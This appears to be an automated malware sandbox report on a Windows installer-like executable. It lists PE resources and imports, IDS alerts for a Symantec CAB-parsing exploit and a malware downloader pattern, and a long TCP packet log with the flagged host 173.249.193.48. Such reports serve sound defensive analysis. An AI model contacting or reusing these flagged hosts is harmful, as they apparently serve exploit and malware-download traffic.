                                    .rsrc0x3de0000x56ef80x57000c1896e67b80e50079ebeadcac8c0d8c3False0.13646338451867815data2.5203155069997596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x3de2c80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.11415584223451786
                                    RT_ICON0x4202f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.17530758310658937
                                    RT_ICON0x430b180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.27551867219917014
                                    RT_ICON0x4330c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.3295028142589118
                                    RT_ICON0x4341680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.47074468085106386
                                    RT_DIALOG0x4345d00x100dataEnglishUnited States0.5234375
                                    RT_DIALOG0x4346d00x11cdataEnglishUnited States0.6056338028169014
                                    RT_DIALOG0x4347f00xc4dataEnglishUnited States0.5918367346938775
                                    RT_DIALOG0x4348b80x60dataEnglishUnited States0.7291666666666666
                                    RT_GROUP_ICON0x4349180x4cdataEnglishUnited States0.7894736842105263
                                    RT_VERSION0x4349680x250dataEnglishUnited States0.5287162162162162
                                    RT_MANIFEST0x434bb80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                    DLLImport
                                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-11-04T16:08:14.078293+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.549704TCP
                                    2024-11-04T16:08:44.574237+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549845173.249.193.4880TCP
                                    2024-11-04T16:08:53.376869+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.549889TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 4, 2024 16:08:43.871211052 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:43.876151085 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:43.879237890 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:43.879375935 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:43.884689093 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.574017048 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.574126005 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.574137926 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.574150085 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.574161053 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.574173927 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.574233055 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.574237108 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.574244976 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.574258089 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.574268103 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.574270010 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.574286938 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.574302912 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.579205036 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.579220057 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.579274893 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.693521023 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.693547010 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.693561077 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.693608046 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.693612099 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.693620920 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.693649054 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.693655014 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.693675041 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.693687916 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.693826914 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.693847895 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.693861008 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.693890095 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.693907022 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.694256067 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.694283962 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.694297075 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.694322109 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.694346905 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.694365025 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.694379091 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.694411039 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.695199966 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.695214033 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.695224047 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.695238113 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.695259094 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.695271015 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.695280075 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.695298910 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.696116924 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.696137905 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.696150064 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.696156025 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.696171045 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.696190119 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.698554039 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.698568106 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.698580027 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.698597908 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.698601007 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.698621988 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.698664904 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813009977 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813040018 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813051939 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813110113 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813143015 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813152075 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813163996 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813174963 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813188076 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813199043 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813234091 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813268900 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813281059 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813292027 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813309908 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813335896 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813375950 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813388109 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813431978 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813458920 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813488960 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813499928 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813500881 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813523054 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813541889 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813606024 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813616991 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813627958 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813638926 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813653946 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813685894 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.813935041 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.813994884 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814007044 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814038038 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.814050913 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.814080954 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814094067 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814105034 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814122915 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814131975 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.814142942 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.814172983 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.814228058 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814239979 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814249992 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814273119 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.814301014 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.814732075 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814775944 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814788103 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814811945 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.814835072 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.814841032 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814852953 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814867973 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814892054 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.814905882 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.814933062 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814944983 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.814960003 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.815021038 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.815037966 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.815342903 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.815360069 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.815371037 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.815403938 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.815419912 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.815448046 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.815460920 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.815470934 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.815499067 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.815526009 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.815556049 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.815567970 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.815581083 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.815591097 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.815602064 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.815649986 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.818144083 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.818227053 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.931869984 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.931898117 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.931910038 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.931920052 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.931931019 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.931943893 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.931956053 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.931967020 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932007074 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.932060957 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.932199001 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932257891 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932272911 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932300091 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.932312965 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.932332039 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932343960 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932354927 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932384968 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.932415962 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.932429075 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932440042 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932451010 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932485104 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.932497978 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.932524920 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932800055 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932816982 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932841063 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.932853937 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.932873964 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932885885 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.932923079 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.932990074 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933075905 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933087111 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933098078 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933109999 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933120966 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933156967 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933156967 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933221102 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933233976 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933239937 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933245897 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933262110 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933271885 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933280945 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933284998 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933306932 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933324099 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933449030 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933461905 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933473110 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933482885 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933492899 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933496952 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933499098 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933511972 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933518887 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933523893 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933545113 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933571100 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933631897 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933671951 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933708906 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933721066 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933732033 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933743000 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933749914 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933762074 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933784962 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933856964 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933870077 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933878899 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933885098 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933895111 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.933919907 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.933949947 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937035084 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937055111 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937066078 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937108040 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937113047 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937145948 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937206030 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937217951 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937228918 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937248945 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937252998 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937264919 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937273026 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937278032 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937300920 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937326908 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937344074 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937407017 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937448025 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937469959 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937480927 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937491894 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937503099 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937519073 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937539101 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937572002 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937582970 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937613010 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937621117 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937649012 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937655926 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937663078 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937680960 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937697887 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937705994 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937725067 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937741041 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937761068 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937772989 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937783003 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937798023 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937818050 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937840939 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937854052 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937871933 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937881947 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937884092 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937895060 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937908888 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937918901 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.937937975 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.937948942 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.938004017 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938016891 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938057899 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.938062906 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938076019 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938116074 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.938170910 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938210964 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.938239098 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938251972 CET8049845173.249.193.48192.168.2.5
